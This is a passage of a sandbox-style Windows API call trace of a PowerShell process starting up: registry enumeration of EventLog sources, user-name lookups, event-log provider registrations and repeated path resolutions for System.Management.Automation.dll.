RegOpenKeyExW (in: hKey=0x32c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x364) returned 0x0 [0153.066] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x0) returned 0x2 [0153.067] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x0) returned 0x5 [0153.263] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x368) returned 0x0 [0153.263] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x0) returned 0x2 [0153.263] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x36c) returned 0x0 [0153.263] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x370) returned 0x0 [0153.264] RegCloseKey (hKey=0x370) returned 0x0 [0153.264] RegCloseKey (hKey=0x32c) returned 0x0 [0153.265] RegCloseKey (hKey=0x36c) returned 0x0 [0153.278] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12e894 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12e894) returned 0x1 [0153.279] GetLastError () returned 0x3 [0153.280] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12e89c | out: lpBuffer="aETAdzjz", pcbBuffer=0x12e89c) returned 1 [0153.365] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6fc | out: phkResult=0x12e6fc*=0x32c) returned 0x0 [0153.365] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12e764, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e760, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12e764*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e760*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.365] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x0, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.365] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x1, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.365] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x2, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.365] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x3, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.366] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x4, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.366] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x5, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.366] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x6, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.366] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x7, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.366] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x8, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.366] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x370) returned 0x0 [0153.367] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.367] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x374) returned 0x0 [0153.367] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.367] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x378) returned 0x0 [0153.367] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.368] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x37c) returned 0x0 [0153.368] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.368] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x380) returned 0x0 [0153.368] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.368] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x384) returned 0x0 [0153.368] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.369] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x5 [0153.371] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x388) returned 0x0 [0153.371] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.371] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x38c) returned 0x0 [0153.372] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x390) returned 0x0 [0153.372] RegCloseKey (hKey=0x390) returned 0x0 [0153.372] RegCloseKey (hKey=0x32c) returned 0x0 [0153.372] RegCloseKey (hKey=0x38c) returned 0x0 [0153.372] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6fc | out: phkResult=0x12e6fc*=0x38c) returned 0x0 [0153.372] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12e764, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e760, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12e764*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e760*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.372] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.373] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.373] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.373] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.373] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.373] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.373] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.394] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.394] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x509ca8, lpcchName=0x12e780, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12e780, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.395] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x32c) returned 0x0 [0153.395] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.395] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x390) returned 0x0 [0153.395] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.396] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x394) returned 0x0 [0153.396] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.396] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x398) returned 0x0 [0153.396] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.396] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x39c) returned 0x0 [0153.397] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.397] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x3a0) returned 0x0 [0153.397] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.397] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x5 [0153.399] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x3a4) returned 0x0 [0153.400] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x0) returned 0x2 [0153.400] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x3a8) returned 0x0 [0153.400] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e72c | out: phkResult=0x12e72c*=0x3ac) returned 0x0 [0153.400] RegCloseKey (hKey=0x3ac) returned 0x0 [0153.400] RegCloseKey (hKey=0x38c) returned 0x0 [0153.401] RegCloseKey (hKey=0x3a8) returned 0x0 [0153.401] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6f0 | out: phkResult=0x12e6f0*=0x3a8) returned 0x0 [0153.402] RegQueryInfoKeyW (in: hKey=0x3a8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12e758, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e754, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12e758*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e754*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.402] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x0, lpName=0x509ca8, lpcchName=0x12e774, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12e774, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.402] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x1, lpName=0x509ca8, lpcchName=0x12e774, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12e774, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.402] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x2, lpName=0x509ca8, lpcchName=0x12e774, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12e774, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.402] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x3, lpName=0x509ca8, lpcchName=0x12e774, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12e774, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.403] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x4, lpName=0x509ca8, lpcchName=0x12e774, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12e774, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.403] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x5, lpName=0x509ca8, lpcchName=0x12e774, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12e774, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.403] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x6, lpName=0x509ca8, lpcchName=0x12e774, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12e774, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.403] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x7, lpName=0x509ca8, lpcchName=0x12e774, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12e774, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.403] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x8, lpName=0x509ca8, lpcchName=0x12e774, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12e774, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.404] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x38c) returned 0x0 [0153.404] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x0) returned 0x2 [0153.404] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x3ac) returned 0x0 [0153.404] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x0) returned 0x2 [0153.404] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x3b0) returned 0x0 [0153.405] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x0) returned 0x2 [0153.405] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x3b4) returned 0x0 [0153.405] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x0) returned 0x2 [0153.405] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x3b8) returned 0x0 [0153.405] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x0) returned 0x2 [0153.406] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x3bc) returned 0x0 [0153.406] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x0) returned 0x2 [0153.406] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x0) returned 0x5 [0153.408] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x3c0) returned 0x0 [0153.408] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x0) returned 0x2 [0153.409] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x3c4) returned 0x0 [0153.409] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e720 | out: phkResult=0x12e720*=0x3c8) returned 0x0 [0153.409] RegCloseKey (hKey=0x3c8) returned 0x0 [0153.409] RegCloseKey (hKey=0x3a8) returned 0x0 [0153.409] RegCloseKey (hKey=0x3c4) returned 0x0 [0153.423] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4f20004 [0153.428] GetLastError () returned 0x0 [0153.430] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3439470*="WSMan", lpRawData=0x3439318) returned 1 [0153.434] GetLastError () returned 0x0 [0153.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.434] GetLastError () returned 0xcb [0153.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.435] GetLastError () returned 0xcb [0153.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.435] GetLastError () returned 0xcb [0153.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.435] GetLastError () returned 0xcb [0153.436] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12e894 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12e894) returned 0x1 [0153.436] GetLastError () returned 0xcb [0153.436] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12e89c | out: lpBuffer="aETAdzjz", pcbBuffer=0x12e89c) returned 1 [0153.437] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x343d2f8*="Alias", lpRawData=0x343d1b4) returned 1 [0153.440] GetLastError () returned 0x0 [0153.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.441] GetLastError () returned 0xcb [0153.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.441] GetLastError () returned 0xcb [0153.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.442] GetLastError () returned 0xcb [0153.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.442] GetLastError () returned 0xcb [0153.442] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12e894 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12e894) returned 0x1 [0153.442] GetLastError () returned 0xcb [0153.442] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12e89c | out: lpBuffer="aETAdzjz", pcbBuffer=0x12e89c) returned 1 [0153.443] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3441238*="Environment", lpRawData=0x34410f4) returned 1 [0153.446] GetLastError () returned 0x0 [0153.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 